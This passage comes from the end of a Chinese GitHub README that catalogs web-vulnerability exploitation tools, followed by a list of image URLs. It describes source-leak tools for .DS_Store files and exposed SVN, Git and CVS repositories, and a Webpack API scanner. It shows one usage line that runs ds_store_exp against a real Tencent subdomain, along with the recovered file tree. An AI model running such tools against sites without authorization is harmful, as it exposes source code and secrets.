1228 | | 文件名 | 文件类型 | CheckSum | 1229 | +--------------------+----------+------------------------------------------------+ 1230 | | conn.php | file | $sha1$8f47ccbd4a436aa4f31018fea026275f6059ed10 | 1231 | | trunk | dir | None | 1232 | | branches | dir | None | 1233 | | admin_login.php | file | $sha1$a6981b1ca963c8a75e133e38780be7ff0cd60952 | 1234 | | phpmyadmin | file | $sha1$6d5af41c175e344ee483732648edc9318b2a6014 | 1235 | | README.TXT | file | $sha1$c5981462cc06422f4a78e68f0a48dddcf5860eb9 | 1236 | | README.txt | file | $sha1$ef4b5f3081dbac31f9fb089aafd60dd2b9474b51 | 1237 | | secret.php | file | $sha1$2e6a7a6976d31847f0eebf7bbc252bcc1ff4f609 | 1238 | | README.md | file | $sha1$466f5ab1e4adfd373a23f639e0dd8fcfdce7874b | 1239 | | img/login_bg01.jpg | file | $sha1$311efc58c4d7035a54fdb8e94d6ba901c56354fd | 1240 | | img | dir | None | 1241 | | index.php | file | $sha1$4660847a73ab0906d91841dde9576bd5054b2020 | 1242 | | test.sql | file | $sha1$096a90da3e471a472874413b18cb2f5dd0567fd1 | 1243 | | admin.php | file | $sha1$f444d3aad996577872ac7b95a2c05aa11e6b1f8f | 1244 | | document | dir | None | 1245 | | tags | dir | None | 1246 | +--------------------+----------+------------------------------------------------+ 1247 | ``` 1248 | 1249 | ## .DS_Store文件泄露利用工具 1250 | 1251 | ### 项目地址 1252 | 1253 | ``` 1254 | https://github.com/lijiejie/ds_store_exp 1255 | ``` 1256 | 1257 | ### 项目介绍 1258 | 1259 | ``` 1260 | ds_store_exp 1261 | .DS_Store文件泄露漏洞。 1262 | 1263 | 它解析.DS_Store文件并以递归方式下载文件。 1264 | 1265 | 这是一个 .DS_Store 文件泄漏利用脚本,它解析.DS_Store文件并递归地下载文件到本地。 1266 | ds_store_exp.py http://hd.zj.qq.com/themes/galaxyw/.DS_Store 1267 | 1268 | hd.zj.qq.com/ 1269 | └── themes 1270 | └── galaxyw 1271 | ├── app 1272 | │ └── css 1273 | │ └── style.min.css 1274 | ├── cityData.min.js 1275 | ├── images 1276 | │ └── img 1277 | │ ├── bg-hd.png 1278 | │ ├── bg-item-activity.png 1279 | │ ├── bg-masker-pop.png 1280 | │ ├── btn-bm.png 1281 | │ ├── btn-login-qq.png 1282 | │ ├── btn-login-wx.png 1283 | │ ├── ico-add-pic.png 1284 | │ ├── ico-address.png 1285 | │ ├── ico-bm.png 1286 | │ ├── ico-duration-time.png 1287 | │ ├── ico-pop-close.png 1288 | │ ├── ico-right-top-delete.png 1289 | │ ├── page-login-hd.png 1290 | │ ├── pic-masker.png 1291 | │ └── ticket-selected.png 1292 | └── member 1293 | ├── assets 1294 | │ ├── css 1295 | │ │ ├── ace-reset.css 1296 | │ │ └── antd.css 1297 | │ └── lib 1298 | │ ├── cityData.min.js 1299 | │ └── ueditor 1300 | │ ├── index.html 1301 | │ ├── lang 1302 | │ │ └── zh-cn 1303 | │ │ ├── images 1304 | │ │ │ ├── copy.png 1305 | │ │ │ ├── localimage.png 1306 | │ │ │ ├── music.png 1307 | │ │ │ └── upload.png 1308 | │ │ └── zh-cn.js 1309 | │ ├── php 1310 | │ │ ├── action_crawler.php 1311 | │ │ ├── action_list.php 1312 | │ │ ├── action_upload.php 1313 | │ │ ├── config.json 1314 | │ │ ├── controller.php 1315 | │ │ └── Uploader.class.php 1316 | │ ├── ueditor.all.js 1317 | │ ├── ueditor.all.min.js 1318 | │ ├── ueditor.config.js 1319 | │ ├── ueditor.parse.js 1320 | │ └── ueditor.parse.min.js 1321 | └── static 1322 | ├── css 1323 | │ └── page.css 1324 | ├── img 1325 | │ ├── bg-table-title.png 1326 | │ ├── bg-tab-say.png 1327 | │ ├── ico-black-disabled.png 1328 | │ ├── ico-black-enabled.png 1329 | │ ├── ico-coorption-person.png 1330 | │ ├── ico-miss-person.png 1331 | │ ├── ico-mr-person.png 1332 | │ ├── ico-white-disabled.png 1333 | │ └── ico-white-enabled.png 1334 | └── scripts 1335 | ├── js 1336 | └── lib 1337 | └── jquery.min.js 1338 | 1339 | 21 directories, 48 files 1340 | ``` 1341 | 1342 | ## .cvs源代码泄露利用工具 1343 | 1344 | ### 项目地址 1345 | 1346 | ``` 1347 | https://github.com/kost/dvcs-ripper 1348 | ``` 1349 | 1350 | ### 项目介绍 1351 | 1352 | ``` 1353 | dvcs-ripper 1354 | 翻录 Web 可访问(分布式)版本控制系统:SVN、GIT、Mercurial/hg、bzr、... 1355 | 1356 | 即使关闭目录浏览,它也可以翻录存储库。 1357 | 确保将自己定位在要下载/克隆存储库的空目录中。 1358 | Support for brute forcing pack names 1359 | Intelligent guessing of packed refs 1360 | Support for objects/info/packs from https://www.kernel.org/pub/software/scm/git/docs/gitrepository-layout.html 1361 | Recognize 404 pages which return 200 1362 | Introduce ignore SSL/TLS verification in SVN/CVS 1363 | Bzr support 1364 | ``` 1365 | 1366 | ## Webpack安全检测的扫描工具 1367 | 1368 | ### 项目地址 1369 | 1370 | ``` 1371 | https://github.com/rtcatc/Packer-Fuzzer 1372 | ``` 1373 | 1374 | ### 项目介绍 1375 | 1376 | ``` 1377 | Packer Fuzzer 1378 | 一款针对Webpack等前端打包工具所构造的网站进行快速、高效安全检测的扫描工具 1379 | 本工具支持自动模糊提取对应目标站点的API以及API对应的参数内容,并支持对:未授权访问、敏感信息泄露、CORS、SQL注入、水平越权、弱口令、任意文件上传七大漏洞进行模糊高效的快速检测。在扫描结束之后,本工具还支持自动生成扫描报告,您可以选择便于分析的HTML版本以及较为正规的doc、pdf、txt版本。 1380 | ``` 1381 | 1382 | # 工具合集整理 1383 | 1384 | 以上所有工具都附上了下载地址,如果不想一一下载,这里已经打包好以上所有工具,公众号后台发送:**漏洞利用工具**,即可获取工具包 1385 | 1386 | ![image](assets/image-20240627171913-hl7u95d.png) 1387 | 1388 | 最后再次申明: 1389 | 1390 | > 此合集所有工具都来源于互联网公开收集整理,请勿从事非法测试!!!在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。利用此工具集而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与原作者及收集者无关。该仅供安全人员用于授权测试,请勿非法使用!!!除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用本工具集。 您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。 1391 | > 1392 | > 注:工具集有些工具杀软会报毒,请自行判断是否存在后门,收集作者未加入任何后门!!!,建议在本地虚拟机中使用。 1393 | 欢迎关注本公众号,每日更新最新漏洞情报: 1394 | 1395 | ![6017e4d55b8bd80eb79047ce4051aeb](https://github.com/onewinner/POCS/assets/94044430/aa35b0e3-c224-4507-8a16-4b7efa29f241) 1396 | 1397 | 1398 | ## Star History 1399 | 1400 | [![Star History Chart](https://api.star-history.com/svg?repos=onewinner/VulToolsKit&type=Date)](https://star-history.com/#onewinner/VulToolsKit&Date) 1401 | -------------------------------------------------------------------------------- /assets/image-20240627092425-33egjal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627092425-33egjal.png -------------------------------------------------------------------------------- /assets/image-20240627092641-z11lhhg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627092641-z11lhhg.png -------------------------------------------------------------------------------- /assets/image-20240627092704-luie0j9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627092704-luie0j9.png -------------------------------------------------------------------------------- /assets/image-20240627093029-rgwih84.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627093029-rgwih84.png -------------------------------------------------------------------------------- /assets/image-20240627093039-hy5mms2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627093039-hy5mms2.png -------------------------------------------------------------------------------- /assets/image-20240627093052-vlaj022.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627093052-vlaj022.png -------------------------------------------------------------------------------- /assets/image-20240627093100-nm5ryus.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627093100-nm5ryus.png -------------------------------------------------------------------------------- /assets/image-20240627093105-rs0mp7q.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627093105-rs0mp7q.png -------------------------------------------------------------------------------- /assets/image-20240627094033-t8q9zy8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627094033-t8q9zy8.png -------------------------------------------------------------------------------- /assets/image-20240627094041-c9nfwhn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627094041-c9nfwhn.png -------------------------------------------------------------------------------- /assets/image-20240627094050-the5fq1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627094050-the5fq1.png -------------------------------------------------------------------------------- /assets/image-20240627095322-zf9bpzu.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627095322-zf9bpzu.png -------------------------------------------------------------------------------- /assets/image-20240627095433-z1d6prl.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627095433-z1d6prl.png -------------------------------------------------------------------------------- /assets/image-20240627101405-x3af9e7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627101405-x3af9e7.png -------------------------------------------------------------------------------- /assets/image-20240627102006-4vbn0vg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627102006-4vbn0vg.png -------------------------------------------------------------------------------- /assets/image-20240627104833-9sown7s.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627104833-9sown7s.png -------------------------------------------------------------------------------- /assets/image-20240627105040-78fliwh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627105040-78fliwh.png -------------------------------------------------------------------------------- /assets/image-20240627105705-su49pl9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627105705-su49pl9.png -------------------------------------------------------------------------------- /assets/image-20240627105833-30qtagk.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627105833-30qtagk.png -------------------------------------------------------------------------------- /assets/image-20240627110852-l8sj81i.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627110852-l8sj81i.png -------------------------------------------------------------------------------- /assets/image-20240627111232-o0yu9hz.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627111232-o0yu9hz.png -------------------------------------------------------------------------------- /assets/image-20240627112005-llx5b02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627112005-llx5b02.png -------------------------------------------------------------------------------- /assets/image-20240627112211-pznr73j.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627112211-pznr73j.png -------------------------------------------------------------------------------- /assets/image-20240627120159-t5v1a60.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627120159-t5v1a60.png -------------------------------------------------------------------------------- /assets/image-20240627135442-l71fy4u.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627135442-l71fy4u.png -------------------------------------------------------------------------------- /assets/image-20240627135553-9ru7crz.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627135553-9ru7crz.png -------------------------------------------------------------------------------- /assets/image-20240627135620-r0s0fge.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627135620-r0s0fge.png -------------------------------------------------------------------------------- /assets/image-20240627140034-p4j08o0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627140034-p4j08o0.png -------------------------------------------------------------------------------- /assets/image-20240627140100-p4fdeel.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627140100-p4fdeel.png -------------------------------------------------------------------------------- /assets/image-20240627140431-7i0plqs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627140431-7i0plqs.png -------------------------------------------------------------------------------- /assets/image-20240627140732-5a1mfgs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627140732-5a1mfgs.png -------------------------------------------------------------------------------- /assets/image-20240627141452-r6kpkoo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627141452-r6kpkoo.png -------------------------------------------------------------------------------- /assets/image-20240627142612-xriy2tx.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627142612-xriy2tx.png -------------------------------------------------------------------------------- /assets/image-20240627143837-y5l0gsi.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627143837-y5l0gsi.png -------------------------------------------------------------------------------- /assets/image-20240627144355-s3e1ix4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627144355-s3e1ix4.png -------------------------------------------------------------------------------- /assets/image-20240627144633-2abln9a.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627144633-2abln9a.png -------------------------------------------------------------------------------- /assets/image-20240627145957-zcz22sx.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627145957-zcz22sx.png -------------------------------------------------------------------------------- /assets/image-20240627151424-u1j7xhx.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627151424-u1j7xhx.png -------------------------------------------------------------------------------- /assets/image-20240627153035-qz8pjh6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627153035-qz8pjh6.png -------------------------------------------------------------------------------- /assets/image-20240627153943-1ajvqbh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627153943-1ajvqbh.png -------------------------------------------------------------------------------- /assets/image-20240627155236-lk8g7s3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627155236-lk8g7s3.png -------------------------------------------------------------------------------- /assets/image-20240627155326-pdu5b7r.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627155326-pdu5b7r.png -------------------------------------------------------------------------------- /assets/image-20240627164850-vfxoylp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627164850-vfxoylp.png -------------------------------------------------------------------------------- /assets/image-20240627171913-hl7u95d.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/onewinner/VulToolsKit/3a7310d15be8dd59230857be0291a3d0a8f4b32d/assets/image-20240627171913-hl7u95d.png --------------------------------------------------------------------------------